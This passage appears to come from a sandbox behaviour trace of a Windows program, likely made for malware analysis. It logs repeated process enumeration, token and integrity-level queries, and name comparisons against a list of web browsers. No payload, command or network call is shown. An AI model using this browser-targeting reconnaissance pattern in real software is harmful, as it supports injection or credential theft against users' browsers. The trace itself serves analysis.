TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0536.915] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0536.915] CloseHandle (hObject=0x29c) returned 1 [0536.915] CloseHandle (hObject=0x298) returned 1 [0536.916] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0536.916] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0536.916] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0536.916] GetLastError () returned 0x7a [0536.916] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0536.916] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0536.916] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0536.916] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0536.916] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0536.916] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0536.916] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0536.916] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0536.916] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0536.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0536.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0536.916] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0536.916] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0536.916] GetLastError () returned 0x7a [0536.917] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0536.917] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0536.917] CloseHandle (hObject=0x29c) returned 1 [0536.917] CloseHandle (hObject=0x298) returned 1 [0536.917] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0536.917] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0536.917] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0536.917] GetLastError () returned 0x7a [0536.917] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0536.917] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0536.917] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0536.917] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0536.917] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0536.917] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0536.917] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0536.917] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0536.917] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0536.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0536.918] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0536.918] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0536.918] GetLastError () returned 0x7a [0536.918] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0536.918] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0536.918] CloseHandle (hObject=0x29c) returned 1 [0536.918] CloseHandle (hObject=0x298) returned 1 [0536.918] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0536.918] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0536.918] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0536.918] GetLastError () returned 0x7a [0536.918] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0536.918] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0536.918] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0536.918] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0536.918] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0536.918] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0536.918] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0536.919] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0536.919] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0536.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0536.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0536.919] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0536.919] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0536.919] GetLastError () returned 0x7a [0536.919] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0536.919] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0536.919] CloseHandle (hObject=0x29c) returned 1 [0536.919] CloseHandle (hObject=0x298) returned 1 [0536.919] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0536.919] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0536.919] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0536.919] GetLastError () returned 0x7a [0536.919] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0536.919] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0536.919] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0536.919] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0536.919] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0536.919] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0536.919] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0536.920] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0536.920] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0536.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0536.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0536.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0536.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0536.920] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0536.920] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0536.920] GetLastError () returned 0x7a [0536.920] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0536.920] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0536.920] CloseHandle (hObject=0x29c) returned 1 [0536.920] CloseHandle (hObject=0x298) returned 1 [0536.920] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0536.920] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0536.920] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0536.920] GetLastError () returned 0x7a [0536.920] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0536.920] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0536.920] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0536.920] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0536.921] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0536.921] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0536.921] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0536.921] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0536.921] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0536.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0536.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x57c) returned 0x0 [0536.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0536.921] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0536.921] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0538.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa7f0) returned 0xc0000004 [0538.926] VirtualAlloc (lpAddress=0x0, dwSize=0xb7f0, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0538.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb7f0, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0538.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0538.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0538.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0538.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0538.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0538.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0538.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0538.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0538.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0538.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0538.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0538.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0538.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0538.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0538.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0538.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0538.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0538.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0538.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0538.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0538.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0538.930] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0538.930] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0538.930] GetLastError () returned 0x7a [0538.930] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0538.930] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0538.930] CloseHandle (hObject=0x29c) returned 1 [0538.931] CloseHandle (hObject=0x298) returned 1 [0538.931] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0538.931] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0538.931] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0538.931] GetLastError () returned 0x7a [0538.931] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0538.931] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0538.931] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0538.932] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0538.932] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0538.932] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0538.932] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0538.932] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0538.932] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0538.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0538.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0538.932] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0538.932] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0538.932] GetLastError () returned 0x7a [0538.933] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0538.933] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0538.933] CloseHandle (hObject=0x29c) returned 1 [0538.933] CloseHandle (hObject=0x298) returned 1 [0538.933] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0538.933] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0538.933] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0538.933] GetLastError () returned 0x7a [0538.934] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0538.934] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0538.934] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0538.934] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0538.934] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0538.934] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0538.934] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0538.934] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0538.934] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0538.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0538.934] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0538.935] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0538.935] GetLastError () returned 0x7a [0538.935] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0538.935] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0538.935] CloseHandle (hObject=0x29c) returned 1 [0538.935] CloseHandle (hObject=0x298) returned 1 [0538.935] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0538.935] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0538.935] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0538.936] GetLastError () returned 0x7a [0538.936] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0538.936] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0538.936] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0538.936] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0538.936] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0538.936] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0538.936] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0538.936] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0538.936] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0538.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0538.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0538.937] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0538.937] GetTokenInformation (in: TokenHandle=0x29c, 